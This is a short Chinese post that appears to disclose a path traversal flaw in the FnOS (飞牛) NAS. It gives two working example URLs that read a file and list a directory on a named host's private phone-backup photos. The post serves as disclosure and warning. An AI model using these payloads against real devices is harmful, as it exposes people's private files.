• 时间:
  • 分类:

涉密的数据永远不要联网,很早以前我发过一个帖子: https://www.v2ex.com/t/1106691

这次飞牛漏洞可以通过浏览器访问任意文件。例子:

文件访问: https://nasnas1.5ddd.com/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1001/Photos/MobileBackup/Xiaomi%20MI%20CC%209/DCIM/2023/10/Screenshot_2023-10-30-19-30-37-516_com.tencent.mm.jpg

目录访问: https://nasnas1.5ddd.com/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1001/Photos/MobileBackup/Xiaomi%20MI%20CC%209/

而且 fnos id 连接不受速度限制,也不需要验证码,攻击者可以脚本批量扫描获取大量用户文件。

标签: none

添加新评论